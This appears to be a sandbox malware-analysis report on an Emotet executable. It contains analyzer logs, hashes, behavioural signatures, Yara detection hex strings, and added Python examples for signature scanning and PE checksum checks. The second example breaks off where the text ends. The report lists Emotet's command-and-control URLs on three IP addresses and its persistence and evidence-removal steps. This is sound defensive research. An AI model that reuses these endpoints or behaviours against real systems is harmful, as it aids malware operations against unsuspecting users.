2019-10-10 01:57:29,423 [root] DEBUG: DLL loaded at 0x742F0000: C:\Windows\SysWOW64\RASAPI32 (0x52000 bytes).
2019-10-10 01:57:29,423 [root] DEBUG: DLL loaded at 0x742D0000: C:\Windows\SysWOW64\rasman (0x15000 bytes).
2019-10-10 01:57:29,423 [root] DEBUG: DLL unloaded from 0x742F0000.
2019-10-10 01:57:29,423 [root] DEBUG: DLL loaded at 0x742C0000: C:\Windows\SysWOW64\rtutils (0xd000 bytes).
2019-10-10 01:57:29,437 [root] DEBUG: DLL loaded at 0x742B0000: C:\Windows\SysWOW64\sensapi (0x6000 bytes).
2019-10-10 01:57:29,437 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 01:57:29,437 [root] DEBUG: DLL unloaded from 0x742D0000.
2019-10-10 01:57:29,453 [root] DEBUG: DLL loaded at 0x74BD0000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-10-10 01:57:29,470 [root] DEBUG: DLL loaded at 0x74BC0000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-10-10 01:57:29,470 [root] DEBUG: DLL loaded at 0x74BA0000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-10-10 01:57:29,470 [root] DEBUG: DLL loaded at 0x74BF0000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-10-10 01:57:29,470 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-10-10 01:57:29,484 [root] DEBUG: DLL loaded at 0x74BE0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-10-10 01:57:29,484 [root] DEBUG: DLL loaded at 0x742A0000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-10-10 01:57:29,484 [root] DEBUG: DLL loaded at 0x741B0000: C:\Windows\SysWOW64\rasadhlp (0x6000 bytes).
2019-10-10 01:57:29,500 [root] DEBUG: DLL loaded at 0x74170000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-10-10 01:57:29,516 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-10-10 01:57:29,548 [root] DEBUG: DLL loaded at 0x74110000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-10-10 01:57:29,548 [root] DEBUG: DLL loaded at 0x74100000: C:\Windows\SysWOW64\RpcRtRemote (0xe000 bytes).
2019-10-10 01:57:29,562 [root] DEBUG: DLL loaded at 0x740E0000: C:\Windows\SysWOW64\DHCPCSVC (0x12000 bytes).
2019-10-10 01:57:29,562 [root] DEBUG: DLL loaded at 0x740D0000: C:\Windows\SysWOW64\dhcpcsvc6 (0xd000 bytes).
2019-10-10 01:57:29,562 [root] DEBUG: DLL unloaded from 0x74360000.
2019-10-10 01:57:29,562 [root] DEBUG: DLL unloaded from 0x740E0000.
2019-10-10 01:57:31,950 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 01:57:42,371 [root] DEBUG: DLL unloaded from 0x751B0000.
2019-10-10 01:57:42,371 [root] DEBUG: DLL unloaded from 0x74110000.
2019-10-10 01:57:42,401 [root] DEBUG: DLL unloaded from 0x75600000.
2019-10-10 01:57:58,079 [root] DEBUG: DLL unloaded from 0x75D60000.
2019-10-10 01:59:22,913 [root] DEBUG: DLL unloaded from 0x000007FEFD430000.
2019-10-10 01:59:22,944 [root] INFO: Announced starting service "WerSvc"
2019-10-10 01:59:22,944 [root] INFO: Announced 64-bit process name: svchost.exe pid: 884
2019-10-10 01:59:22,960 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:59:22,960 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:59:22,960 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:59:22,960 [root] DEBUG: Loader: Injecting process 884 (thread 1308) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,960 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 01:59:22,960 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,960 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FFA1B000 - 0x000007FEFF430000
2019-10-10 01:59:22,974 [root] DEBUG: InjectDllViaIAT: Allocated 0x20c bytes for new import table at 0x00000000FFA20000.
2019-10-10 01:59:22,974 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:59:22,974 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,974 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 884
2019-10-10 01:59:22,974 [root] INFO: Announced 64-bit process name: svchost.exe pid: 884
2019-10-10 01:59:22,974 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:59:22,974 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:59:22,990 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:59:22,990 [root] DEBUG: Loader: Injecting process 884 (thread 1308) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,990 [root] DEBUG: Process image base: 0x00000000FFA10000
2019-10-10 01:59:22,990 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,990 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:59:22,990 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:22,990 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 884
2019-10-10 01:59:23,006 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:59:23,006 [root] DEBUG: Process dumps enabled.
2019-10-10 01:59:23,006 [root] INFO: Disabling sleep skipping.
2019-10-10 01:59:23,006 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:59:23,006 [root] WARNING: Unable to hook LockResource
2019-10-10 01:59:23,022 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:59:23,022 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 884 at 0x00000000741C0000, image base 0x00000000FFA10000, stack from 0x0000000000275000-0x0000000000280000
2019-10-10 01:59:23,022 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe -k WerSvcGroup.
2019-10-10 01:59:23,022 [root] INFO: Added new process to list with pid: 884
2019-10-10 01:59:23,022 [root] INFO: Monitor successfully loaded in process with pid 884.
2019-10-10 01:59:23,052 [root] DEBUG: DLL loaded at 0x000007FEF9C40000: c:\windows\system32\wersvc (0x18000 bytes).
2019-10-10 01:59:23,052 [root] DEBUG: DLL unloaded from 0x000007FEF9C40000.
2019-10-10 01:59:23,085 [root] DEBUG: DLL loaded at 0x000007FEF7420000: C:\Windows\System32\faultrep (0x5c000 bytes).
2019-10-10 01:59:23,099 [root] DEBUG: DLL loaded at 0x000007FEF8CA0000: C:\Windows\System32\wer (0x7c000 bytes).
2019-10-10 01:59:23,131 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-10-10 01:59:23,131 [root] DEBUG: DLL loaded at 0x000007FEFD020000: C:\Windows\System32\profapi (0xf000 bytes).
2019-10-10 01:59:23,131 [root] DEBUG: DLL loaded at 0x000007FEFC3B0000: C:\Windows\System32\USERENV (0x1e000 bytes).
2019-10-10 01:59:23,163 [root] INFO: Announced 64-bit process name: WerFault.exe pid: 2680
2019-10-10 01:59:23,163 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:59:23,163 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:59:23,163 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:59:23,163 [root] DEBUG: Loader: Injecting process 2680 (thread 2636) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,163 [root] DEBUG: Process image base: 0x00000000FF530000
2019-10-10 01:59:23,163 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,177 [root] DEBUG: InjectDllViaIAT: Found a free region from 0x00000000FF599000 - 0x000007FEFF430000
2019-10-10 01:59:23,177 [root] DEBUG: InjectDllViaIAT: Allocated 0x25c bytes for new import table at 0x00000000FF5A0000.
2019-10-10 01:59:23,177 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2019-10-10 01:59:23,177 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,177 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2680
2019-10-10 01:59:23,177 [root] DEBUG: DLL loaded at 0x000007FEFCEF0000: C:\Windows\system32\apphelp (0x57000 bytes).
2019-10-10 01:59:23,177 [root] INFO: Announced 64-bit process name: WerFault.exe pid: 2680
2019-10-10 01:59:23,177 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2019-10-10 01:59:23,177 [lib.api.process] INFO: 64-bit DLL to inject is C:\epyfuwi\dll\DQkWzH.dll, loader C:\epyfuwi\bin\nUWuvqFN.exe
2019-10-10 01:59:23,194 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\rYYoJNHlMV.
2019-10-10 01:59:23,194 [root] DEBUG: Loader: Injecting process 2680 (thread 2636) with C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,194 [root] DEBUG: Process image base: 0x00000000FF530000
2019-10-10 01:59:23,194 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,194 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2019-10-10 01:59:23,194 [root] DEBUG: Successfully injected DLL C:\epyfuwi\dll\DQkWzH.dll.
2019-10-10 01:59:23,194 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2680
2019-10-10 01:59:23,194 [root] DEBUG: DLL unloaded from 0x000007FEF7420000.
2019-10-10 01:59:23,224 [root] DEBUG: Terminate processes on terminate_event enabled.
2019-10-10 01:59:23,224 [root] DEBUG: Process dumps enabled.
2019-10-10 01:59:23,224 [root] INFO: Disabling sleep skipping.
2019-10-10 01:59:23,224 [root] WARNING: Unable to place hook on LockResource
2019-10-10 01:59:23,224 [root] WARNING: Unable to hook LockResource
2019-10-10 01:59:23,224 [root] DEBUG: RestoreHeaders: Restored original import table.
2019-10-10 01:59:23,224 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2680 at 0x00000000741C0000, image base 0x00000000FF530000, stack from 0x00000000001E5000-0x00000000001F0000
2019-10-10 01:59:23,240 [root] DEBUG: Commandline: C:\Windows\sysnative\WerFault.exe -u -p 1632 -s 2896.
2019-10-10 01:59:23,240 [root] INFO: Added new process to list with pid: 2680
2019-10-10 01:59:23,240 [root] INFO: Monitor successfully loaded in process with pid 2680.
2019-10-10 01:59:23,286 [root] DEBUG: DLL loaded at 0x000007FEFC1C0000: C:\Windows\system32\VERSION (0xc000 bytes).
2019-10-10 01:59:23,302 [root] DEBUG: DLL unloaded from 0x00000000772D0000.
2019-10-10 01:59:23,319 [root] DEBUG: DLL unloaded from 0x000007FEF7420000.
2019-10-10 01:59:24,082 [root] DEBUG: DLL loaded at 0x000007FEF2D10000: C:\Windows\system32\dbgeng (0x374000 bytes).
2019-10-10 01:59:24,082 [root] DEBUG: DLL loaded at 0x000007FEF4360000: C:\Windows\system32\dbghelp (0x125000 bytes).
2019-10-10 01:59:24,161 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2019-10-10 01:59:25,361 [root] DEBUG: DLL unloaded from 0x000007FEF4360000.
2019-10-10 01:59:25,378 [root] DEBUG: DLL loaded at 0x000007FEFBA20000: C:\Windows\system32\SensApi (0x9000 bytes).
2019-10-10 01:59:26,127 [root] DEBUG: DLL loaded at 0x000007FEF9900000: C:\Windows\system32\werui (0x2d000 bytes).
2019-10-10 01:59:26,127 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\system32\CRYPTBASE (0xf000 bytes).
2019-10-10 01:59:26,141 [root] DEBUG: DLL loaded at 0x000007FEFB320000: C:\Windows\system32\DUI70 (0xf2000 bytes).
2019-10-10 01:59:26,141 [root] DEBUG: DLL loaded at 0x000007FEFB060000: C:\Windows\system32\DUser (0x43000 bytes).
2019-10-10 01:59:26,157 [root] DEBUG: DLL loaded at 0x000007FEF5030000: C:\Windows\system32\RICHED20 (0x9e000 bytes).
2019-10-10 01:59:27,000 [root] DEBUG: DLL loaded at 0x000007FEFD560000: C:\Windows\system32\SHELL32 (0xd88000 bytes).
2019-10-10 01:59:27,062 [root] DEBUG: DLL loaded at 0x000007FEFB7C0000: C:\Windows\system32\UxTheme (0x56000 bytes).
2019-10-10 01:59:27,062 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 01:59:27,062 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 01:59:27,062 [root] DEBUG: DLL unloaded from 0x0000000076EF0000.
2019-10-10 01:59:27,062 [root] DEBUG: DLL unloaded from 0x000007FEFB060000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x0000000076EF0000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x000007FEFB060000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x000007FEFBB00000.
2019-10-10 01:59:27,078 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2019-10-10 02:00:43,767 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-10-10 02:00:43,767 [root] INFO: Created shutdown mutex.
2019-10-10 02:00:44,782 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 1632
2019-10-10 02:00:44,782 [root] INFO: Terminate event set for process 1632.
2019-10-10 02:00:44,782 [root] INFO: Terminating process 1632 before shutdown.
2019-10-10 02:00:44,782 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:45,796 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:46,809 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:47,823 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:48,838 [lib.api.process] INFO: Successfully terminated process with pid 1632.
2019-10-10 02:00:48,854 [root] INFO: Waiting for process 1632 to exit.
2019-10-10 02:00:49,868 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2732
2019-10-10 02:00:49,868 [root] DEBUG: Terminate Event: Attempting to dump process 2732
2019-10-10 02:00:49,868 [root] INFO: Terminate event set for process 2732.
2019-10-10 02:00:49,868 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-10-10 02:00:49,868 [root] INFO: Terminating process 2732 before shutdown.
2019-10-10 02:00:49,868 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:00:49,868 [root] INFO: Waiting for process 2732 to exit.
2019-10-10 02:00:49,868 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-10-10 02:00:49,868 [root] DEBUG: DumpProcess: Module entry point VA is 0x00007DD3.
2019-10-10 02:00:49,882 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\2732_4495177164901104102019
2019-10-10 02:00:49,882 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xa600.
2019-10-10 02:00:49,882 [root] DEBUG: Terminate Event: Skipping dump of process 2732
2019-10-10 02:00:49,882 [root] DEBUG: Terminate Event: Shutdown complete for process 2732 but failed to inform analyzer.
2019-10-10 02:00:50,881 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 884
2019-10-10 02:00:50,881 [root] DEBUG: Terminate Event: Attempting to dump process 884
2019-10-10 02:00:50,881 [root] INFO: Terminate event set for process 884.
2019-10-10 02:00:50,881 [root] INFO: Terminating process 884 before shutdown.
2019-10-10 02:00:50,881 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FFA10000.
2019-10-10 02:00:50,881 [root] INFO: Waiting for process 884 to exit.
2019-10-10 02:00:50,881 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:00:50,881 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FFA10000.
2019-10-10 02:00:50,881 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000246C.
2019-10-10 02:00:50,897 [root] DEBUG: DLL loaded at 0x000007FEFCF50000: C:\Windows\System32\cryptbase (0xf000 bytes).
2019-10-10 02:00:50,897 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\884_5526042975001104102019
2019-10-10 02:00:50,897 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6600.
2019-10-10 02:00:50,897 [root] DEBUG: Terminate Event: Skipping dump of process 884
2019-10-10 02:00:50,913 [root] DEBUG: Terminate Event: Shutdown complete for process 884 but failed to inform analyzer.
2019-10-10 02:00:51,895 [lib.api.process] INFO: Successfully received reply to terminate_event, pid 2680
2019-10-10 02:00:51,895 [root] DEBUG: Terminate Event: Attempting to dump process 2680
2019-10-10 02:00:51,895 [root] INFO: Terminate event set for process 2680.
2019-10-10 02:00:51,895 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00000000FF530000.
2019-10-10 02:00:51,895 [root] INFO: Terminating process 2680 before shutdown.
2019-10-10 02:00:51,895 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2019-10-10 02:00:51,895 [root] INFO: Waiting for process 2680 to exit.
2019-10-10 02:00:51,895 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF530000.
2019-10-10 02:00:51,895 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000044920.
2019-10-10 02:00:51,927 [root] INFO: Added new CAPE file to list with path: C:\eFiNvgcB\CAPE\2680_14517731695101104102019
2019-10-10 02:00:51,927 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x65600.
2019-10-10 02:00:51,941 [root] DEBUG: Terminate Event: Skipping dump of process 2680
2019-10-10 02:00:51,941 [root] DEBUG: Terminate Event: Shutdown complete for process 2680 but failed to inform analyzer.
2019-10-10 02:00:52,910 [root] INFO: Shutting down package.
2019-10-10 02:00:52,910 [root] INFO: Stopping auxiliary modules.
2019-10-10 02:00:52,910 [root] INFO: Finishing auxiliary modules.
2019-10-10 02:00:52,910 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-10-10 02:00:52,910 [root] WARNING: File at path "C:\eFiNvgcB\debugger" does not exist, skip.
2019-10-10 02:00:52,910 [root] INFO: Analysis completed.

MalScore

10.0

Emotet

Machine

Name target-01
Label target-01
Manager ESX
Started On 2019-10-10 00:57:00
Shutdown On 2019-10-10 01:01:07

File Details

File Name ygg9ytft62s5ip.exe
File Size 624643 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0efd85b3915d9618f91979e65e520478
SHA1 e70ff18b0f850df07c81c168437f78d51c679625
SHA256 a1d4243b1e2380d5fc9d26ea036bd00c39f09cdcdfc1a3d2b699b5fc15cf29a0
SHA512 41601f2bafff43599da6e50b07952f743669e7cafabebcc1b1caf441c89425814c22b5094fe1bc72bc414c0c3f1024fbfaa54688cfc0c39c1f016a71d609ac42
CRC32 E6EF58FC
Ssdeep 6144:89b9SO5dVdRQ/vqkg1gEagdQHiQSzPgAJ76KkWv:8fBV7uikFgCShJkQ
TrID
  • 41.0% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 36.3% (.EXE) Win64 Executable (generic) (27625/18/4)
  • 8.6% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 5.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 2.6% (.EXE) OS/2 Executable (generic) (2029/13)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
At least one process apparently crashed during execution
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 1988 triggered the Yara rule 'Emotet'
Hit: PID 1356 triggered the Yara rule 'Emotet'
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: ygg9ytft62s5ip.exe, PID 1988
Mimics the system's user agent string for its own requests
Dynamic (imported) function loading detected
Performs HTTP requests potentially not found in PCAP.
url: 94.183.71.206:7080/devices/loadan/
url: 91.83.93.105:8080/taskbar/
url: 91.83.93.105:8080/publish/
url: 91.83.93.105:8080/attrib/forced/
url: 91.83.93.105:8080/prov/
url: 91.83.93.105:8080/health/teapot/
url: 91.83.93.105:8080/sess/balloon/tpt/merge/
url: 91.83.93.105:8080/merge/
url: 91.83.93.105:8080/scripts/teapot/site/
url: 91.83.93.105:8080/arizona/
url: 91.83.93.105:8080/forced/prov/health/
url: 91.83.93.105:8080/srvc/xian/
url: 91.83.93.105:8080/entries/
url: 91.83.93.105:8080/chunk/between/odbc/
url: 125.99.61.162:7080/stubs/ringin/
Repeatedly searches for a not-found process, may want to run with startbrowser=1 option
CAPE extracted potentially suspicious content
ygg9ytft62s5ip.exe: Emotet Payload
    Yara rule: Emotet (author kevoreilly, cape_type Emotet Payload)
    Matched identifiers: snippet2 at offset 5037 (0x13ad), snippet6 at offset 21716 (0x54d4)
    Matched hex strings:
        { 6A 13 68 01 00 01 00 FF 15 58 17 41 00 85 C0 }
        { 33 C0 21 05 5C 39 41 00 A3 58 39 41 00 39 05 90 03 41 00 74 18 40 A3 58 39 41 00 83 3C C5 90 03 41 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }
ygg9ytft62s5ip.exe: Emotet Payload
    Same Yara rule, hex strings and offsets as the match above (reported a second time by CAPE)
Drops a binary and executes it
binary: C:\Windows\SysWOW64\prepmspterm.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://91.83.93.105:8080/taskbar/
suspicious_request: http://91.83.93.105:8080/publish/
suspicious_request: http://91.83.93.105:8080/attrib/forced/
suspicious_request: http://91.83.93.105:8080/prov/
suspicious_request: http://91.83.93.105:8080/health/teapot/
suspicious_request: http://91.83.93.105:8080/sess/balloon/tpt/merge/
suspicious_request: http://91.83.93.105:8080/merge/
suspicious_request: http://91.83.93.105:8080/scripts/teapot/site/
suspicious_request: http://91.83.93.105:8080/arizona/
suspicious_request: http://91.83.93.105:8080/forced/prov/health/
suspicious_request: http://91.83.93.105:8080/srvc/xian/
suspicious_request: http://91.83.93.105:8080/entries/
suspicious_request: http://91.83.93.105:8080/chunk/between/odbc/
Performs some HTTP requests
url: http://91.83.93.105:8080/taskbar/
url: http://91.83.93.105:8080/publish/
url: http://91.83.93.105:8080/attrib/forced/
url: http://91.83.93.105:8080/prov/
url: http://91.83.93.105:8080/health/teapot/
url: http://91.83.93.105:8080/sess/balloon/tpt/merge/
url: http://91.83.93.105:8080/merge/
url: http://91.83.93.105:8080/scripts/teapot/site/
url: http://91.83.93.105:8080/arizona/
url: http://91.83.93.105:8080/forced/prov/health/
url: http://91.83.93.105:8080/srvc/xian/
url: http://91.83.93.105:8080/entries/
url: http://91.83.93.105:8080/chunk/between/odbc/
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\prepmspterm.exe:Zone.Identifier
Installs itself for autorun at Windows startup
service name: prepmspterm
service path: "C:\Windows\SysWOW64\prepmspterm.exe"
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\prepmspterm.exe
Anomalous binary characteristics
anomaly: Actual checksum does not match that reported in PE header
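The CAPE Yara hit listed above names two hex strings and the offsets at which they matched. The following added example (not CAPE's code and not kevoreilly's rule file) shows how a YARA hex string of that kind turns into a byte regex and where it lands in a buffer. It goes slightly beyond the page's strings by also accepting "??" wildcards and "[n-m]" jumps, which the page's strings do not use. The 128-byte buffer and the offsets 16 and 64 are constructed for this example and are not the report's addresses.

```python
import re

# Hex strings copied from the CAPE Yara match reported above (rule "Emotet", author kevoreilly).
EMOTET_SNIPPETS = {
    "snippet2": "{ 6A 13 68 01 00 01 00 FF 15 58 17 41 00 85 C0 }",
    "snippet6": "{ 33 C0 21 05 5C 39 41 00 A3 58 39 41 00 39 05 90 03 41 00 74 18 40 "
                "A3 58 39 41 00 83 3C C5 90 03 41 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }",
}


def yara_hex_to_regex(hex_string):
    """Translate a YARA hex string into a compiled bytes regex.

    Supported tokens: literal bytes, whole-byte wildcards '??', and jumps '[n]' or
    '[n-m]'. Nibble wildcards such as '6?' are not handled by this example.
    """
    parts = []
    for tok in hex_string.strip().strip("{}").split():
        if tok == "??":
            parts.append(b".")
        elif tok.startswith("[") and tok.endswith("]"):
            lo, _, hi = tok[1:-1].partition("-")
            hi = hi or lo                      # "[4]" means exactly four bytes
            parts.append(b".{%d,%d}" % (int(lo), int(hi)))
        else:
            parts.append(re.escape(bytes([int(tok, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


def hex_bytes(hex_string):
    """The literal bytes of a wildcard-free hex string."""
    return bytes.fromhex("".join(hex_string.strip().strip("{}").split()))


def scan(data, rules):
    """Return {identifier: [offsets]} for every hex string that occurs in data."""
    hits = {}
    for name, hex_string in rules.items():
        offsets = [m.start() for m in yara_hex_to_regex(hex_string).finditer(data)]
        if offsets:
            hits[name] = offsets
    return hits


def build_sample():
    """Constructed test buffer: NOP padding with snippet2 at offset 16 and snippet6 at 64."""
    buf = bytearray(b"\x90" * 128)
    s2 = hex_bytes(EMOTET_SNIPPETS["snippet2"])
    s6 = hex_bytes(EMOTET_SNIPPETS["snippet6"])
    buf[16:16 + len(s2)] = s2
    buf[64:64 + len(s6)] = s6
    return bytes(buf)


if __name__ == "__main__":
    print(scan(build_sample(), EMOTET_SNIPPETS))
    # A wildcarded variant of snippet2 still lands on the same offset.
    print(scan(build_sample(), {"loose": "{ 6A 13 68 ?? ?? ?? ?? FF 15 [4] 85 C0 }"}))
```

The first snippet is a plain call sequence (push 0x13, push 0x10001, call through an absolute import slot, test eax); the absolute addresses inside both strings tie the rule to a payload mapped at 0x400000, which is why CAPE matches it against the extracted payload rather than the packed file on disk.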

Hosts

Direct IP Country Name
Y 94.183.71.206 [VT] Iran, Islamic Republic of
Y 91.83.93.105 [VT] Hungary
Y 125.99.61.162 [VT] India

DNS

No domains contacted.


Summary

PE Information

Image Base 0x00400000
Entry Point 0x00407dd3
Reported Checksum 0x0009e705
Actual Checksum 0x000a1768
Minimum OS Version 5.0
Compile Time 2019-10-06 18:27:14
Import Hash 8740bde339723d73ad60369c868b5940
Exported DLL Name MHMS.exe
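The checksum anomaly flagged in the signatures (reported 0x0009e705, actual 0x000a1768) comes from recomputing OptionalHeader.CheckSum over the whole file. A stale checksum is not proof of tampering on its own, since many toolchains never set the field, but a set-and-wrong value on a file whose version resource claims a 2003 "Monkey Head Media Stream" build and whose .rsrc section accounts for about 584 KB of the 625 KB file is consistent with a payload grafted into a repurposed host application. The following added example (not CAPE's or pefile's code) implements the checksum walk and a locate-and-compare check. It runs on a constructed minimal header rather than the sample, and the tampered variant shows what the report's mismatch looks like.

```python
import struct


def pe_checksum(data, checksum_offset):
    """Recompute OptionalHeader.CheckSum over a PE file image.

    checksum_offset is the file offset of the 4-byte CheckSum field, which the
    algorithm skips. This is the documented 16-bit one's-complement sum with
    end-around carry, plus the file length, as used by imagehlp and pefile.
    """
    padded = data + b"\x00" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += int.from_bytes(padded[off:off + 4], "little")
        total = (total & 0xFFFFFFFF) + (total >> 32)      # fold the carry back in
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def checksum_field_offset(data):
    """e_lfanew -> 'PE\\0\\0' (4) + FileHeader (20) + 64 bytes into the OptionalHeader."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    return e_lfanew + 4 + 20 + 64


def verify(data):
    """Return (reported, actual, match) for a PE image held in memory."""
    off = checksum_field_offset(data)
    reported = struct.unpack_from("<I", data, off)[0]
    actual = pe_checksum(data, off)
    return reported, actual, reported == actual


def build_fake_pe(tamper=False):
    """Constructed minimal image: DOS header with e_lfanew=0x40, PE signature, 20-byte
    FileHeader, 96-byte OptionalHeader, 256 bytes of filler. Not loadable; only enough
    structure for the checksum walk. With tamper=True one filler byte is flipped after
    the checksum was written, which is the kind of post-link edit the anomaly reflects."""
    img = bytearray(b"\x00" * 0x40 + b"PE\0\0" + b"\x00" * (20 + 96) + bytes(range(256)))
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)
    off = checksum_field_offset(bytes(img))
    struct.pack_into("<I", img, off, pe_checksum(bytes(img), off))
    if tamper:
        img[-1] ^= 0xFF
    return bytes(img)


if __name__ == "__main__":
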